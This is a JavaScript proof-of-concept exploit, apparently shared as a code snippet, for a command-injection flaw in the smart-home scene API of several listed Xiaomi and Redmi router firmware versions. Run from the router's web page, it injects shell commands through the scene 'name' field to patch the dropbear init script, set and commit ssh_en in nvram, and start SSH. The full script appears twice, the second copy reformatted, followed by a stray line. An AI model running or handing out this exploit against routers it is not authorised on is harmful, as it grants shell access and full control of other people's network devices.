FloatSheep/xqsmartcontroller.js

## xqsmartcontroller.js
/* 本 PoC 基于 https://www.right.com.cn/forum/thread-8348455-1-1.html 制作 */
/* 适用于
  小米万兆路由器: MiWiFi ROM 稳定版 1.0.53
  小米路由器 AC2100: MiWiFi ROM 稳定版 2.0.743
  小米路由器 AX1800: MiWiFi ROM 稳定版 1.0.399
  小米路由器 AX3000: MiWiFi ROM 稳定版 1.0.48 / 1.0.46
  小米 AIoT 物联路由器 AX3600: MiWiFi ROM 稳定版 1.1.21
  小米路由器 AX9000: MiWiFi ROM 稳定版 1.0.165
  小米 AIoT 物联路由器 AC2350: MiWiFi ROM 稳定版 1.3.8
  红米路由器 AX5400 电竞版: MiWiFi ROM 稳定版 1.0.95
  红米路由器 AX3000: MiWiFi ROM 稳定版 1.0.33
  及以上路由器更低版本固件 */

const xqUrl = window.location.href.split("/web")[0];

async function vulnerabilityApplicator() {
  try {
    await fetch(
      `${xqUrl}/api/misystem/set_sys_time?time=2023-2-19%2023:4:47&timezone=CST-8`
    );

    const dropbearConfigApply = await fetch(
      `${xqUrl}/api/xqsmarthome/request_smartcontroller`,
      {
        method: "POST",
        headers: {
          "Content-Type": "application/x-www-form-urlencoded",
        },
        body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(sed%20-i%20s%2Frelease%2FXXXXXX%2Fg%20%2Fetc%2Finit.d%2Fdropbear)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A1%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
      }
    );

    if (
      dropbearConfigApply.code === 3 ||
      dropbearConfigApply.code === -100 ||
      dropbearConfigApply.code === 3001
    ) {
      throw new Error(dropbearConfigApply.msg);
    } else if (dropbearConfigApply.status === 500) {
      throw new Error("无法应用 dropbear 配置，请尝试降低路由器固件版本");
    }

    const triggerController = await fetch(
      `${xqUrl}/api/xqsmarthome/request_smartcontroller`,
      {
        method: "POST",
        headers: {
          "Content-Type": "application/x-www-form-urlencoded",
        },
        body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A1%22%2C%22week%22%3A0%7D",
      }
    );

    if (triggerController.code === 3004 || triggerController.code === -100) {
      throw new Error(triggerController.msg);
    } else if (triggerController.status === 500) {
      throw new Error("无法调用触发器，请检查路由器运行状态");
    }

    await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(nvram%20set%20ssh_en%3D1)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A2%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
    });

    await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A2%22%2C%22week%22%3A0%7D",
    });

    await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(nvram%20commit)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A3%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
    });

    await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A3%22%2C%22week%22%3A0%7D",
    });

    const sshCallback = await fetch(`${xqUrl}/api/xqsystem/fac_info`);
    const sshStatusText = await sshCallback.text();
    const sshStatus = JSON.parse(sshStatusText);

    if (!sshStatus.ssh) {
      throw new Error("无法开启 ssh，请重试或尝试其他方法");
    } else {
      console.log("开启 ssh 配置是成功的，正在开启 ssh 服务...");
    }

    await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(%2Fetc%2Finit.d%2Fdropbear%20enable)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A4%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
    });
    await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
      method: "POST",
      headers: {
        "Content-Type": "application/x-www-form-urlencoded",
      },
      body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A5%22%2C%22week%22%3A0%7D",
    });
    const nowYear = String(new Date().getFullYear());
    const nowMonth = (new Date().getMonth() + 1).toLocaleString();
    const nowDay = new Date().getDate().toLocaleString();
    const nowHour = new Date().getHours().toLocaleString();
    const nowMinute = new Date().getMinutes().toLocaleString();
    const nowSecond = new Date().getSeconds().toLocaleString();
    await fetch(
      `${xqUrl}/api/misystem/set_sys_time?time=${nowYear}-${nowMonth}-${nowDay}%20${nowHour}:${nowMinute}:${nowSecond}&timezone=CST-8`
    );
    console.log("漏洞似乎应用成功，请尝试连接路由器");
  } catch (err) {
    throw new Error(`应用漏洞时出现问题：${err}`);
  }
}

vulnerabilityApplicator()
  .then((e) => {
    console.log(e);
  })
  .catch((e) => {
    throw new Error(e);
  });
	/* 本 PoC 基于 https://www.right.com.cn/forum/thread-8348455-1-1.html 制作 */
	/* 适用于
	小米万兆路由器: MiWiFi ROM 稳定版 1.0.53
	小米路由器 AC2100: MiWiFi ROM 稳定版 2.0.743
	小米路由器 AX1800: MiWiFi ROM 稳定版 1.0.399
	小米路由器 AX3000: MiWiFi ROM 稳定版 1.0.48 / 1.0.46
	小米 AIoT 物联路由器 AX3600: MiWiFi ROM 稳定版 1.1.21
	小米路由器 AX9000: MiWiFi ROM 稳定版 1.0.165
	小米 AIoT 物联路由器 AC2350: MiWiFi ROM 稳定版 1.3.8
	红米路由器 AX5400 电竞版: MiWiFi ROM 稳定版 1.0.95
	红米路由器 AX3000: MiWiFi ROM 稳定版 1.0.33
	及以上路由器更低版本固件 */

	const xqUrl = window.location.href.split("/web")[0];

	async function vulnerabilityApplicator() {
	try {
	await fetch(
	`${xqUrl}/api/misystem/set_sys_time?time=2023-2-19%2023:4:47&timezone=CST-8`
	);

	const dropbearConfigApply = await fetch(
	`${xqUrl}/api/xqsmarthome/request_smartcontroller`,
	{
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(sed%20-i%20s%2Frelease%2FXXXXXX%2Fg%20%2Fetc%2Finit.d%2Fdropbear)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A1%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
	}
	);

	if (
	dropbearConfigApply.code === 3 \|\|
	dropbearConfigApply.code === -100 \|\|
	dropbearConfigApply.code === 3001
	) {
	throw new Error(dropbearConfigApply.msg);
	} else if (dropbearConfigApply.status === 500) {
	throw new Error("无法应用 dropbear 配置，请尝试降低路由器固件版本");
	}

	const triggerController = await fetch(
	`${xqUrl}/api/xqsmarthome/request_smartcontroller`,
	{
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A1%22%2C%22week%22%3A0%7D",
	}
	);

	if (triggerController.code === 3004 \|\| triggerController.code === -100) {
	throw new Error(triggerController.msg);
	} else if (triggerController.status === 500) {
	throw new Error("无法调用触发器，请检查路由器运行状态");
	}

	await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(nvram%20set%20ssh_en%3D1)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A2%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
	});

	await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A2%22%2C%22week%22%3A0%7D",
	});

	await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(nvram%20commit)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A3%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
	});

	await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A3%22%2C%22week%22%3A0%7D",
	});

	const sshCallback = await fetch(`${xqUrl}/api/xqsystem/fac_info`);
	const sshStatusText = await sshCallback.text();
	const sshStatus = JSON.parse(sshStatusText);

	if (!sshStatus.ssh) {
	throw new Error("无法开启 ssh，请重试或尝试其他方法");
	} else {
	console.log("开启 ssh 配置是成功的，正在开启 ssh 服务...");
	}

	await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_setting%22%2C%22name%22%3A%22'%24(%2Fetc%2Finit.d%2Fdropbear%20enable)'%22%2C%22action_list%22%3A%5B%7B%22thirdParty%22%3A%22xmrouter%22%2C%22delay%22%3A17%2C%22type%22%3A%22wan_block%22%2C%22payload%22%3A%7B%22command%22%3A%22wan_block%22%2C%22mac%22%3A%2200%3A00%3A00%3A00%3A00%3A00%22%7D%7D%5D%2C%22launch%22%3A%7B%22timer%22%3A%7B%22time%22%3A%223%3A4%22%2C%22repeat%22%3A%220%22%2C%22enabled%22%3Atrue%7D%7D%7D",
	});
	await fetch(`${xqUrl}/api/xqsmarthome/request_smartcontroller`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded",
	},
	body: "payload=%7B%22command%22%3A%22scene_start_by_crontab%22%2C%22time%22%3A%223%3A5%22%2C%22week%22%3A0%7D",
	});
	const nowYear = String(new Date().getFullYear());
	const nowMonth = (new Date().getMonth() + 1).toLocaleString();
	const nowDay = new Date().getDate().toLocaleString();
	const nowHour = new Date().getHours().toLocaleString();
	const nowMinute = new Date().getMinutes().toLocaleString();
	const nowSecond = new Date().getSeconds().toLocaleString();
	await fetch(
	`${xqUrl}/api/misystem/set_sys_time?time=${nowYear}-${nowMonth}-${nowDay}%20${nowHour}:${nowMinute}:${nowSecond}&timezone=CST-8`
	);
	console.log("漏洞似乎应用成功，请尝试连接路由器");
	} catch (err) {
	throw new Error(`应用漏洞时出现问题：${err}`);
	}
	}

	vulnerabilityApplicator()
	.then((e) => {
	console.log(e);
	})
	.catch((e) => {
	throw new Error(e);
	});
No results found